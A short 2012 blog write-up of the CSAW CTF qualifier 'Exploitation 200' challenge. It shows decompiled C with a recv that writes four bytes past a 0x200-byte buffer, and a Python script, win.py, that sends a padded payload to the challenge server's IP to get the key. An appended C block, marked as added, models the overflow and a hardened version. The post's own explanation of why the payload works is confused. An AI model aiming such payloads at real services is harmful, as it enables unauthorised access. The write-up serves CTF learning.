Sunday, September 30, 2012

CSAW CTF Quals: Exploitation 200

This binary was not so much about exploitation as about understanding how the code they were using worked. So we downloaded the binary and got to work. The important code is shown below.
  memset(&buf, 0, 0x200u);
  send(fd, "Wecome to my first CS project.\nPlease type your name:  ", 0x37u, 0);
  recv(fd, &buf, 0x204u, 0);
  v3 = 0;
  if ( !strcmp(&buf, "AAAAAAAAAAAAAAAAAAAAAAAAAA\n") )
    v4 = 1;
  if ( v4 )
  {
    ::fd = (int)fopen("./key", "r");
    __isoc99_fscanf(::fd, "%s", &buf);
    recv(fd, 0, 0x10u, 64);
    send(fd, &buf, 0x200u, 0);
  }
 
We got this working on our local machine and got the key by simply sending the string AAAAAAAAAAAAAAAAAAAAAAAAAA\n to the server, which would spit back the key that we created at the beginning of the string we wrote, like bobAAAAAAAAAAAAAAAAAAAAAAA. However, to the bewilderment of our group, this did not work on their server.

We knew that they gave us a large number of bytes to play with in the buffer and with the recv, so we eventually just sent AAAAAAAAAAAAAAAAAAAAAAAAAA\n+'A'*100+'\x00' to the game server, and it spat the key back to us embedded in the payload. We believe that it did not work in the first case because the buffer was set to all null bytes and there was not enough 'space' available to write to, because the payload we sent was too small to fit the key into. So our winning payload, win.py, is shown below.
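import socket

# Connect to the challenge server.
s = socket.socket()
s.connect(('128.238.66.218', 54321))

s.recv(1024)  # read the name prompt
# Magic string, padded with 'A' up to 0x200 bytes, then a null byte.
winner = b'AAAAAAAAAAAAAAAAAAAAAAAAAA\n'
winner += b'A' * (0x200 - len(winner)) + b'\x00'
print(winner)
s.sendall(winner + b'\n')
#s.sendall(b'a'*15 + b'\n')
print(s.recv(1024))  # reply from the server, key embedded in the payload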
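
Added example (not from the original post or the challenge binary): the decompiled code clears 0x200 bytes of buf but lets recv write up to 0x204, and win.py sends 0x202 bytes. The model below assumes v4 sits directly after buf and is not reset after the read, which the post does not show; struct frame, fake_recv and the function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x200
#define MAGIC "AAAAAAAAAAAAAAAAAAAAAAAAAA\n"

/* ASSUMPTION: flag (v4 in the decompilation) sits directly after buf. */
struct frame { char buf[BUF_SIZE]; unsigned char flag[4]; };

/* Stand-in for recv(): copy at most `limit` bytes, starting at buf. */
static void fake_recv(struct frame *f, const char *in, size_t len, size_t limit) {
    memcpy(f, in, len < limit ? len : limit);
}

/* Logic as shown in the post: 0x204-byte read limit, 0x200-byte buffer. */
int key_path_as_shown(const char *in, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);              /* deterministic start for the model */
    fake_recv(&f, in, len, 0x204);        /* last 4 bytes can land in flag */
    if (strcmp(f.buf, MAGIC) == 0) f.flag[0] = 1;
    return (f.flag[0] | f.flag[1] | f.flag[2] | f.flag[3]) != 0;
}

/* Hardened: the read stays inside buf and only strcmp decides the result. */
int key_path_hardened(const char *in, size_t len) {
    struct frame f;
    memset(&f, 0, sizeof f);
    fake_recv(&f, in, len, BUF_SIZE - 1); /* always keep a terminating NUL */
    return strcmp(f.buf, MAGIC) == 0;
}

/* Constructed input: the bytes win.py sends (0x200 padded, NUL, newline). */
size_t build_writeup_payload(char *out) {
    memcpy(out, MAGIC, strlen(MAGIC));
    memset(out + strlen(MAGIC), 'A', BUF_SIZE - strlen(MAGIC));
    out[BUF_SIZE] = '\0';
    out[BUF_SIZE + 1] = '\n';
    return BUF_SIZE + 2;
}

int main(void) {
    char p[BUF_SIZE + 2];
    size_t n = build_writeup_payload(p);
    printf("as shown: %d, hardened: %d\n",
           key_path_as_shown(p, n), key_path_hardened(p, n));
    return 0;
}
```

Under that assumption both versions accept the bare 27-byte string, but only the version with the 0x204 limit accepts the padded payload, and it does so without strcmp ever matching.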


  -- suntzu_II
